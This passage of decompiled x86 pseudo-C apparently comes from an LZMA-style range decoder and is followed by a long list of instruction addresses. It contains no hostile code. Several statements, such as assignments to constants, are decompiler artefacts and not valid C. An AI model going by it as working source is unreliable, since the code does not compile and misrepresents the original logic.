											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                          0x00000000
                                          0x00407068
                                          0x00407068
                                          0x0040706c
                                          0x00407095
                                          0x0040709f
                                          0x0040706e
                                          0x00407077
                                          0x00407084
                                          0x00407087
                                          0x004073cb
                                          0x004073cb
                                          0x004073ce
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00000000
                                          0x00000000
                                          0x0040741c
                                          0x00407420
                                          0x004075cf
                                          0x004075e5
                                          0x004075ed
                                          0x004075f4
                                          0x004075f6
                                          0x004075fd
                                          0x00407601
                                          0x00407601
                                          0x0040742c
                                          0x00407433
                                          0x0040743b
                                          0x0040743e
                                          0x00407441
                                          0x00407441
                                          0x00407447
                                          0x00407447
                                          0x00406be3
                                          0x00406be3
                                          0x00406be3
                                          0x00406bec
                                          0x00000000
                                          0x00000000
                                          0x00406bf2
                                          0x00000000
                                          0x00406bfd
                                          0x00000000
                                          0x00000000
                                          0x00406c06
                                          0x00406c09
                                          0x00406c0c
                                          0x00406c10
                                          0x00000000
                                          0x00000000
                                          0x00406c16
                                          0x00406c19
                                          0x00406c1b
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406c21
                                          0x00406c22
                                          0x00406c24
                                          0x00406c27
                                          0x00406c2c
                                          0x00406c31
                                          0x00406c3a
                                          0x00406c4d
                                          0x00406c50
                                          0x00406c5c
                                          0x00406c84
                                          0x00406c86
                                          0x00406c94
                                          0x00406c94
                                          0x00406c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c88
                                          0x00406c88
                                          0x00406c8b
                                          0x00406c8c
                                          0x00406c8c
                                          0x00000000
                                          0x00406c88
                                          0x00406c62
                                          0x00406c67
                                          0x00406c67
                                          0x00406c70
                                          0x00406c78
                                          0x00406c7b
                                          0x00000000
                                          0x00406c81
                                          0x00406c81
                                          0x00000000
                                          0x00406c81
                                          0x00000000
                                          0x00406c9e
                                          0x00406c9e
                                          0x00406ca2
                                          0x0040754e
                                          0x00000000
                                          0x0040754e
                                          0x00406cab
                                          0x00406cbb
                                          0x00406cbe
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc4
                                          0x00406cc8
                                          0x00000000
                                          0x00000000
                                          0x00406cca
                                          0x00406cd0
                                          0x00406cfa
                                          0x00406d00
                                          0x00406d07
                                          0x00000000
                                          0x00406d07
                                          0x00406cd6
                                          0x00406cd9
                                          0x00406cde
                                          0x00406cde
                                          0x00406ce9
                                          0x00406cf1
                                          0x00406cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d39
                                          0x00406d3f
                                          0x00406d42
                                          0x00406d4f
                                          0x00406d57
                                          0x004073cb
                                          0x00000000
                                          0x00000000
                                          0x00406d0e
                                          0x00406d0e
                                          0x00406d12
                                          0x0040755d
                                          0x00000000
                                          0x0040755d
                                          0x00406d1e
                                          0x00406d29
                                          0x00406d29
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d32
                                          0x00406d37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004073ce
                                          0x004073ce
                                          0x004073d4
                                          0x004073da
                                          0x004073e0
                                          0x004073fa
                                          0x004073fd
                                          0x00407403
                                          0x0040740e
                                          0x00407410
                                          0x004073e2
                                          0x004073e2
                                          0x004073f1
                                          0x004073f5
                                          0x004073f5
                                          0x0040741a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d5f
                                          0x00406d61
                                          0x00406d64
                                          0x00406dd5
                                          0x00406dd8
                                          0x00406ddb
                                          0x00406de2
                                          0x00406dec
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x004073cb
                                          0x00406d66
                                          0x00406d6a
                                          0x00406d6d
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d75
                                          0x00406d77
                                          0x00406d7a
                                          0x00406d7c
                                          0x00406d81
                                          0x00406d84
                                          0x00406d87
                                          0x00406d8b
                                          0x00406d92
                                          0x00406d95
                                          0x00406d9c
                                          0x00406da0
                                          0x00406da8
                                          0x00406da8
                                          0x00406da8
                                          0x00406da2
                                          0x00406da2
                                          0x00406da2
                                          0x00406d97
                                          0x00406d97
                                          0x00406d97
                                          0x00406dac
                                          0x00406daf
                                          0x00406dcd
                                          0x00406dcf
                                          0x00000000
                                          0x00406db1
                                          0x00406db1
                                          0x00406db4
                                          0x00406db7
                                          0x00406dba
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbc
                                          0x00406dbf
                                          0x00406dc2
                                          0x00406dc4
                                          0x00406dc5
                                          0x00406dc8
                                          0x00000000
                                          0x00406dc8
                                          0x00000000
                                          0x00406ffe
                                          0x00407002
                                          0x00407020
                                          0x00407023
                                          0x0040702a
                                          0x0040702d
                                          0x00407030
                                          0x00407033
                                          0x00407036
                                          0x00407039
                                          0x0040703b
                                          0x00407042
                                          0x00407043
                                          0x00407045
                                          0x00407048
                                          0x0040704b
                                          0x0040704e
                                          0x0040704e
                                          0x00407053
                                          0x00000000
                                          0x00407053
                                          0x00407004
                                          0x00407007
                                          0x0040700a
                                          0x00407014
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004070ab
                                          0x004070af
                                          0x00000000
                                          0x00000000
                                          0x004070b5
                                          0x004070b9
                                          0x00000000
                                          0x00000000
                                          0x004070bf
                                          0x004070c1
                                          0x004070c5
                                          0x004070c5
                                          0x004070c8
                                          0x004070cc
                                          0x00000000
                                          0x00000000
                                          0x0040711c
                                          0x00407120
                                          0x00407127
                                          0x0040712a
                                          0x0040712d
                                          0x00407137
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x004073cb
                                          0x00407122
                                          0x00000000
                                          0x00000000
                                          0x00407143
                                          0x00407147
                                          0x0040714e
                                          0x00407151
                                          0x00407154
                                          0x00407149
                                          0x00407149
                                          0x00407149
                                          0x00407157
                                          0x0040715a
                                          0x0040715d
                                          0x0040715d
                                          0x00407160
                                          0x00407163
                                          0x00407166
                                          0x00407166
                                          0x00407169
                                          0x00407170
                                          0x00407175
                                          0x00000000
                                          0x00000000
                                          0x00407203
                                          0x00407203
                                          0x00407207
                                          0x004075a5
                                          0x00000000
                                          0x004075a5
                                          0x0040720d
                                          0x00407210
                                          0x00407213
                                          0x00407217
                                          0x0040721a
                                          0x00407220
                                          0x00407222
                                          0x00407222
                                          0x00407222
                                          0x00407225
                                          0x00407228
                                          0x00000000
                                          0x00000000
                                          0x00406df8
                                          0x00406df8
                                          0x00406dfc
                                          0x00407569
                                          0x00000000
                                          0x00407569
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0c
                                          0x00406e0f
                                          0x00406e15
                                          0x00406e17
                                          0x00406e17
                                          0x00406e17
                                          0x00406e1a
                                          0x00406e1d
                                          0x00406e1d
                                          0x00406e20
                                          0x00406e23
                                          0x00000000
                                          0x00000000
                                          0x00406e29
                                          0x00406e2f
                                          0x00000000
                                          0x00000000
                                          0x00406e35
                                          0x00406e35
                                          0x00406e39
                                          0x00406e3c
                                          0x00406e3f
                                          0x00406e42
                                          0x00406e45
                                          0x00406e46
                                          0x00406e49
                                          0x00406e4b
                                          0x00406e51
                                          0x00406e54
                                          0x00406e57
                                          0x00406e5a
                                          0x00406e5d
                                          0x00406e60
                                          0x00406e63
                                          0x00406e7f
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8f
                                          0x00406e93
                                          0x00406e95
                                          0x00406e99
                                          0x00406e65
                                          0x00406e65
                                          0x00406e69
                                          0x00406e71
                                          0x00406e76
                                          0x00406e78
                                          0x00406e7a
                                          0x00406e7a
                                          0x00406e9c
                                          0x00406ea3
                                          0x00406ea6
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eac
                                          0x00000000
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406eb5
                                          0x00407575
                                          0x00000000
                                          0x00407575
                                          0x00406ebb
                                          0x00406ebe
                                          0x00406ec1
                                          0x00406ec5
                                          0x00406ec8
                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406edc
                                          0x00000000
                                          0x00000000
                                          0x00406ede
                                          0x00406ee1
                                          0x00406ee4
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eed
                                          0x00406ef0
                                          0x00406ef3
                                          0x00406ef6
                                          0x00406ef9
                                          0x00406efc
                                          0x00406f14
                                          0x00406f17
                                          0x00406f1a
                                          0x00406f1d
                                          0x00406f1d
                                          0x00406f20
                                          0x00406f24
                                          0x00406f26
                                          0x00406efe
                                          0x00406efe
                                          0x00406f06
                                          0x00406f0b
                                          0x00406f0d
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f29
                                          0x00406f30
                                          0x00406f33
                                          0x00000000
                                          0x00406f35
                                          0x00000000
                                          0x00406f35
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00000000
                                          0x00000000
                                          0x00406f75
                                          0x00406f75
                                          0x00406f79
                                          0x00407581
                                          0x00000000
                                          0x00407581
                                          0x00406f7f
                                          0x00406f82
                                          0x00406f85
                                          0x00406f89
                                          0x00406f8c
                                          0x00406f92
                                          0x00406f94
                                          0x00406f94
                                          0x00406f94
                                          0x00406f97
                                          0x00406f9a
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00000000
                                          0x00406f41
                                          0x00406fa2
                                          0x00406fa2
                                          0x00406fa5
                                          0x00406fa8
                                          0x00406fab
                                          0x00406fae
                                          0x00406fb1
                                          0x00406fb4
                                          0x00406fb7
                                          0x00406fba
                                          0x00406fbd
                                          0x00406fc0
                                          0x00406fd8
                                          0x00406fdb
                                          0x00406fde
                                          0x00406fe1
                                          0x00406fe1
                                          0x00406fe4
                                          0x00406fe8
                                          0x00406fea
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fca
                                          0x00406fcf
                                          0x00406fd1
                                          0x00406fd3
                                          0x00406fd3
                                          0x00406fed
                                          0x00406ff4
                                          0x00406ff7
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00406ff9
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x00000000
                                          0x00407395
                                          0x00407399
                                          0x004073bb
                                          0x004073be
                                          0x004073c8
                                          0x004073cb
                                          0x004073cb
                                          0x00000000
                                          0x004073cb
                                          0x004073cb
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a5
                                          0x004073a8
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00407489
                                          0x00407489
                                          0x00000000
                                          0x00407489
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407546
                                          0x00407447
                                          0x00000000
                                          0x00000000
                                          0x0040717d
                                          0x0040717f
